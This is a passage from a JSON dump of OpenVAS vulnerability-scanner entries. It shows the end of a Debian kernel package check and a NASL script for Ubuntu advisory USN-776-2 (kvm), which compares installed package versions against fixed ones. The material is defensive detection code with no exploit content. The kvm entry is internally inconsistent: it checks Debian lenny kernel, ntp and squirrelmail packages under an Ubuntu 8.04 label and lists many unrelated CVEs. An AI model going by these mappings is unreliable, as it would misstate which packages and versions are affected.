rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-5kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-4kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-4kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r5k-cobalt\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-mipsel\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r5k-cobalt\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc-miboot\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc-miboot\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390-tape\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-s390\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-s390\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390x\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-s390x\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-sparc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sparc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sparc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sparc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sparc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:30:12", "description": "The remote host is missing an update to kvm\nannounced via advisory USN-776-2.", "cvss3": {}, "published": "2009-06-05T00:00:00", "type": "openvas", "title": "Ubuntu USN-776-2 (kvm)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2009-1150", "CVE-2009-1010", "CVE-2009-1161", "CVE-2009-1046", "CVE-2007-2807", "CVE-2009-0721", "CVE-2009-0343", "CVE-2009-0157", "CVE-2009-0342", "CVE-2009-0859", "CVE-2009-1415", "CVE-2009-1579", "CVE-2009-0922", "CVE-2009-1184", "CVE-2009-0028", "CVE-2009-1416", "CVE-2008-1945", "CVE-2008-5077", "CVE-2009-1242", "CVE-2008-2004", "CVE-2009-0688", "CVE-2009-1632", "CVE-2008-5814", "CVE-2009-1072", "CVE-2009-0835", "CVE-2009-1011", "CVE-2009-0945", "CVE-2009-0159", "CVE-2009-1192", "CVE-2009-1418", "CVE-2009-1338", "CVE-2009-0154", "CVE-2009-1337", "CVE-2009-1580", "CVE-2009-0269", "CVE-2009-1581", "CVE-2009-1574", "CVE-2009-1417", "CVE-2008-5714", "CVE-2009-1527", "CVE-2009-0834", "CVE-2009-1265", "CVE-2008-2382", "CVE-2009-1439", "CVE-2009-1578", "CVE-2009-1130", "CVE-2009-1009", "CVE-2009-0714", "CVE-2008-1517", "CVE-2009-1252", "CVE-2008-4539"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64175", "href": "http://plugins.openvas.org/nasl.php?oid=64175", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_776_2.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_776_2.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-776-2 (kvm)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 8.04 LTS:\n kvm 1:62+dfsg-0ubuntu8.2\n\nAfter a standard system upgrade you need to restart all KVM VMs to effect\nthe necessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-776-2\";\n\ntag_insight = \"USN-776-1 fixed vulnerabilities in KVM. Due to an incorrect fix, a\nregression was introduced in Ubuntu 8.04 LTS that caused KVM to fail to\nboot virtual machines started via libvirt. This update fixes the problem.\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\n Avi Kivity discovered that KVM did not correctly handle certain disk\n formats. A local attacker could attach a malicious partition that would\n allow the guest VM to read files on the VM host. (CVE-2008-1945,\n CVE-2008-2004)\n\n Alfredo Ortega discovered that KVM's VNC protocol handler did not\n correctly validate certain messages. A remote attacker could send\n specially crafted VNC messages that would cause KVM to consume CPU\n resources, leading to a denial of service. (CVE-2008-2382)\n\n Jan Niehusmann discovered that KVM's Cirrus VGA implementation over VNC\n did not correctly handle certain bitblt operations. A local attacker could\n exploit this flaw to potentially execute arbitrary code on the VM host or\n crash KVM, leading to a denial of service. (CVE-2008-4539)\n\n It was discovered that KVM's VNC password checks did not use the correct\n length. A remote attacker could exploit this flaw to cause KVM to crash,\n leading to a denial of service. (CVE-2008-5714)\";\ntag_summary = \"The remote host is missing an update to kvm\nannounced via advisory USN-776-2.\";\n\n \n\n\nif(description)\n{\n script_id(64175);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2008-1945\", \"CVE-2008-2004\", \"CVE-2008-2382\", \"CVE-2008-4539\", \"CVE-2008-5714\", \"CVE-2009-1130\", \"CVE-2009-1574\", \"CVE-2009-0714\", \"CVE-2008-1517\", \"CVE-2007-2807\", \"CVE-2009-0159\", \"CVE-2009-1252\", \"CVE-2009-1578\", \"CVE-2009-1579\", \"CVE-2009-1580\", \"CVE-2009-1581\", \"CVE-2009-1418\", \"CVE-2009-0028\", \"CVE-2009-0269\", \"CVE-2009-0342\", \"CVE-2009-0343\", \"CVE-2009-0834\", \"CVE-2009-0835\", \"CVE-2009-1184\", \"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\", \"CVE-2009-0154\", \"CVE-2009-1150\", \"CVE-2009-1151\", \"CVE-2009-0922\", \"CVE-2009-1632\", \"CVE-2009-0945\", \"CVE-2009-0688\", \"CVE-2009-1527\", \"CVE-2009-1338\", \"CVE-2009-1242\", \"CVE-2009-1192\", \"CVE-2009-1439\", \"CVE-2009-1337\", \"CVE-2009-0157\", \"CVE-2008-5077\", \"CVE-2008-5814\", \"CVE-2009-0721\", \"CVE-2009-0859\", \"CVE-2009-1046\", \"CVE-2009-1072\", \"CVE-2009-1265\", \"CVE-2009-1011\", \"CVE-2009-1010\", \"CVE-2009-1009\", \"CVE-2009-1161\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-776-2 (kvm)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-776-2/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kvm-source\", ver:\"62+dfsg-0ubuntu8.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kvm\", ver:\"62+dfsg-0ubuntu8.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-refclock\", ver:\"4.2.2.p4+dfsg-2etch3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.4p4+dfsg-3ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-simple\", ver:\"4.2.2.p4+dfsg-2etch3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.4p4+dfsg-3ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.4p4+dfsg-3ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"squirrelmail\", ver:\"1.4.15-4+lenny1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.26-2\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-legacy\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-alpha-legacy\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-generic\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-alpha\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-alpha-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-xen\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-openvz\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-openvz-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-vserver\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-openvz-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"user-mode-linux\", ver:\"2.6.26-1um-2+15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-orion5x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-ixp4xx\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-footbridge\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-orion5x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-footbridge\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-ixp4xx\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-iop32x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-arm\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-iop32x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-versatile\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-armel\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-versatile\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-hppa\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-openvz-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-486\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-openvz-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-i386\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-486\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-ia64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-5kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sb1-bcm91250a\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sb1a-bcm91480b\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sb1-bcm91250a\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-4kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = 